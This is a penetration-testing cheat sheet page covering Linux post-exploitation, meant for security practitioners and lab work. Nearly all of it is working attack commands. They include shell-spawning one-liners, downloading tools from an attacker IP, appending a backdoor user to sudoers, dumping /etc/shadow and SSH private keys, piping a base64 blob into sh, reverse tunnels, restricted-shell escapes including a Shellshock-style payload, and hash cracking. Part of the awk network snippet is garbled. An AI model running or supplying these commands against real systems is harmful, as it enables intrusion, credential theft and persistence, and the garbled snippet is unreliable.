Pentest Book
Search…
Linux

Local Enum

1
**Tools**
2
https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/blob/master/linPEAS/linpeas.sh
3
https://github.com/mbahadou/postenum/blob/master/postenum.sh
4
https://github.com/rebootuser/LinEnum/blob/master/LinEnum.sh
5
https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy32
6
https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy64
7
8
https://gtfobins.github.io/
9
10
# Spawning shell
11
python -c 'import pty; pty.spawn("/bin/bash")'
12
python -c 'import pty; pty.spawn("/bin/sh")'
13
echo os.system('/bin/bash')
14
/bin/sh -i
15
perl -e 'exec "/bin/sh";'
16
ruby: exec "/bin/sh"
17
lua: os.execute('/bin/sh')
18
(From within vi)
19
:!bash
20
:set shell=/bin/bash:shell
21
(From within nmap)
22
!sh
23
24
# Access to more binaries
25
export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
26
27
# Download files from attacker
28
wget http://10.11.1.111:8080/ -r; mv 10.11.1.111:8080 exploits; cd exploits; rm index.html; chmod 700 LinEnum.sh linpeas.sh postenum.sh pspy32 pspy64
29
30
# Enum scripts
31
./LinEnum.sh -t -k password -r LinEnum.txt
32
./postenum.sh
33
./linpeas.sh
34
./pspy
35
36
# Common writable directories
37
/tmp
38
/var/tmp
39
/dev/shm
40
41
# Add user to sudoers
42
useradd hacker
43
passwd hacker
44
echo "hacker ALL=(ALL:ALL) ALL" >> /etc/sudoers
45
46
# sudo permissions
47
sudo -l -l
48
49
# Journalctl
50
If you can run as root, run in small window and !/bin/sh
51
52
# Crons
53
crontab -l
54
ls -alh /var/spool/cron
55
ls -al /etc/ | grep cron
56
ls -al /etc/cron*
57
cat /etc/cron*
58
cat /etc/at.allow
59
cat /etc/at.deny
60
cat /etc/cron.allow
61
cat /etc/cron.deny
62
cat /etc/crontab
63
cat /etc/anacrontab
64
cat /var/spool/cron/crontabs/root
65
cat /etc/frontal
66
cat /etc/anacron
67
systemctl list-timers --all
68
69
# Common info
70
uname -a
71
env
72
id
73
cat /proc/version
74
cat /etc/issue
75
cat /etc/passwd
76
cat /etc/group
77
cat /etc/shadow
78
cat /etc/hosts
79
80
# Users with login
81
grep -vE "nologin" /etc/passwd
82
83
# Network info
84
cat /proc/net/arp
85
cat /proc/net/fib_trie
86
cat /proc/net/fib_trie | grep "|--" | egrep -v "0.0.0.0| 127."
87
awk '/32 host/ { print f } {f=$2}' <<< "$(0; i-=2) {
88
ret = ret"."hextodec(substr(str,i,2))
89
}
90
ret = ret":"hextodec(substr(str,index(str,":")+1,4))
91
return ret
92
}
93
NR > 1 {{if(NR==2)print "Local - Remote";local=getIP($2);remote=getIP($3)}{print local" - "remote}}' /proc/net/tcp
94
95
# Netstat without netstat 2
96
echo "YXdrICdmdW5jdGlvbiBoZXh0b2RlYyhzdHIscmV0LG4saSxrLGMpewogICAgcmV0ID0gMAogICAgbiA9IGxlbmd0aChzdHIpCiAgICBmb3IgKGkgPSAxOyBpIDw9IG47IGkrKykgewogICAgICAgIGMgPSB0b2xvd2VyKHN1YnN0cihzdHIsIGksIDEpKQogICAgICAgIGsgPSBpbmRleCgiMTIzNDU2Nzg5YWJjZGVmIiwgYykKICAgICAgICByZXQgPSByZXQgKiAxNiArIGsKICAgIH0KICAgIHJldHVybiByZXQKfQpmdW5jdGlvbiBnZXRJUChzdHIscmV0KXsKICAgIHJldD1oZXh0b2RlYyhzdWJzdHIoc3RyLGluZGV4KHN0ciwiOiIpLTIsMikpOyAKICAgIGZvciAoaT01OyBpPjA7IGktPTIpIHsKICAgICAgICByZXQgPSByZXQiLiJoZXh0b2RlYyhzdWJzdHIoc3RyLGksMikpCiAgICB9CiAgICByZXQgPSByZXQiOiJoZXh0b2RlYyhzdWJzdHIoc3RyLGluZGV4KHN0ciwiOiIpKzEsNCkpCiAgICByZXR1cm4gcmV0Cn0gCk5SID4gMSB7e2lmKE5SPT0yKXByaW50ICJMb2NhbCAtIFJlbW90ZSI7bG9jYWw9Z2V0SVAoJDIpO3JlbW90ZT1nZXRJUCgkMyl9e3ByaW50IGxvY2FsIiAtICJyZW1vdGV9fScgL3Byb2MvbmV0L3RjcCAKqtc" | base64 -d | sh
97
98
# Nmap without nmap
99
for ip in {1..5}; do for port in {21,22,5000,8000,3306}; do (echo >/dev/tcp/172.18.0.$ip/$port) >& /dev/null && echo "172.18.0.$ip port $port is open"; done; done
100
101
# Open ports without netstat
102
grep -v "rem_address" /proc/net/tcp | awk '{x=strtonum("0x"substr($2,index($2,":")-2,2)); for (i=5; i>0; i-=2) x = x"."strtonum("0x"substr($2,i,2))}{print x":"strtonum("0x"substr($2,index($2,":")+1,4))}'
103
104
# Check ssh files:
105
cat ~/.ssh/authorized_keys
106
cat ~/.ssh/identity.pub
107
cat ~/.ssh/identity
108
cat ~/.ssh/id_rsa.pub
109
cat ~/.ssh/id_rsa
110
cat ~/.ssh/id_dsa.pub
111
cat ~/.ssh/id_dsa
112
cat /etc/ssh/ssh_config
113
cat /etc/ssh/sshd_config
114
cat /etc/ssh/ssh_host_dsa_key.pub
115
cat /etc/ssh/ssh_host_dsa_key
116
cat /etc/ssh/ssh_host_rsa_key.pub
117
cat /etc/ssh/ssh_host_rsa_key
118
cat /etc/ssh/ssh_host_key.pub
119
cat /etc/ssh/ssh_host_key
120
121
# SUID
122
find / -perm -4000 -type f 2>/dev/null
123
# ALL PERMS
124
find / -perm -777 -type f 2>/dev/null
125
# SUID for current user
126
find / perm /u=s -user `whoami` 2>/dev/null
127
find / -user root -perm -4000 -print 2>/dev/null
128
# Writables for current user/group
129
find / perm /u=w -user `whoami` 2>/dev/null
130
find / -perm /u+w,g+w -f -user `whoami` 2>/dev/null
131
find / -perm /u+w -user `whoami` 2>/dev/nul
132
# Dirs with +w perms for current u/g
133
find / perm /u=w -type -d -user `whoami` 2>/dev/null
134
find / -perm /u+w,g+w -d -user `whoami` 2>/dev/null
135
136
# Port Forwarding
137
# Chisel
138
# Victim server:
139
chisel server --auth "test:123" -p 443 --reverse
140
# In host attacker machine:
141
./chisel client --auth "test:123" 10.10.10.10:443 R:socks
142
143
# Dynamic Port Forwarding:
144
# Attacker machine:
145
ssh -D 9050 [email protected]
146
# Attacker machine Burp Proxy - SOCKS Proxy:
147
Mark “Override User Options”
148
Mark Use Socks Proxy:
149
SOCKS host:127.0.0.1
150
SOCKS port:9050
151
152
# Tunneling
153
Target must have SSH running for there service
154
1. Create SSH Tunnel: ssh -D localhost: -f -N [email protected]st -p
155
2. Setup ProxyChains. Edit the following config file (/etc/proxychains.conf)
156
3. Add the following line into the config: Socks5 127.0.0.1
157
4. Run commands through the tunnel: proxychains
158
159
# SShuttle
160
# https://github.com/sshuttle/sshuttle
161
sshuttle -r [email protected] 10.2.2.0/24
162
163
# netsh port forwarding
164
netsh interface portproxy add v4tov4 listenaddress=127.0.0.1 listenport=9000 connectaddress=192.168.0.10 connectport=80
165
netsh interface portproxy delete v4tov4 listenaddress=127.0.0.1 listenport=9000
Copied!

Escaping restricted shell

1
# First check your shell
2
echo $SHELL
3
# and commands
4
export
5
6
# vim
7
# List files
8
:!/bin/ls -l .b*
9
# Set new shell
10
:set shell=/bin/sh
11
:shell
12
# or
13
:!/bin/sh
14
15
# ed
16
!'/bin/sh'
17
18
# ne -> Load Prefs -> Navigate everywhere
19
20
# more/less/man/pinfo
21
!'sh'
22
23
# links -> File OS Shell
24
# lynx -> "o" for options -> configure default editor e.g. vim
25
lynx --editor=/usr/bin/vim www.google.com
26
# or
27
export EDITOR=/usr/bin/vim
28
# navigate to https://translate.google.com/ go to text box, ENTER and F4
29
30
# mutt
31
!
32
33
# find
34
find / -name "root" -exec /bin/sh \;
35
find / -name "root" -exec /bin/awk 'BEGIN {system("/bin/sh")}' \;
36
37
# nmap < 2009/05
38
--interactive
39
!sh
40
41
# awk
42
awk 'BEGIN {system("/bin/sh")}'
43
44
# expect
45
expect -c 'spawn sh' -i
46
47
# python
48
python -c 'import pty; pty.spawn("/bin/sh")'
49
50
# ruby irb
51
exec '/bin/sh'
52
53
# perl
54
perl -e 'system("sh -i");'
55
perl -e 'exec("sh -i");'
56
57
# php -a
58
exec("sh -i");
59
60
# Only Rbash
61
echo x | xargs -Iy sh -c 'exec sh 0<&1'
62
63
# Emacs
64
Mod-!
65
/bin/sh
66
67
# cp
68
cp /bin/sh /dev/shm/sh; /dev/shm/sh
69
70
# export
71
export SHELL=/bin/sh; export PATH=/bin:/usr/bin:$PATH
72
73
# FTP/Telnet
74
!/bin/sh
75
76
# GDB
77
!/bin/sh
78
79
# eval
80
eval echo echo {o..q}ython\;
81
82
# tee
83
echo '/bin/rm /home/user/.bashrc' | tee '/home/user/bin/win';win; echo 'export SHELL=/bin/sh' | tee '/home/user/.bashrc'
84
85
# declare
86
declare -n PATH; export PATH=/bin;bash -i
87
BASH_CMDS[shell]=/bin/bash;shell -i
88
89
# nano
90
nano -s /bin/sh
91
# Ctrl+T
92
93
# SSH
94
ssh [email protected] -t "bash --noprofile -i"
95
ssh [email protected] -t "() { :; }; sh -i "
Copied!

Loot

1
# Linux
2
cat /etc/passwd
3
cat /etc/shadow
4
unshadow passwd shadow > unshadowed.txt
5
john --rules --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt
6
7
ifconfig -a
8
arp -a
9
10
tcpdump -i any -s0 -w capture.pcap
11
tcpdump -i eth0 -w capture -n -U -s 0 src not 10.11.1.111 and dst not 10.11.1.111
12
tcpdump -vv -i eth0 src not 10.11.1.111 and dst not 10.11.1.111
13
14
.bash_history
15
16
/var/mail
17
/var/spool/mail
18
19
echo $DESKTOP_SESSION
20
echo $XDG_CURRENT_DESKTOP
21
echo $GDMSESSION
Copied!
Last modified 1yr ago
Export as PDF
Copy link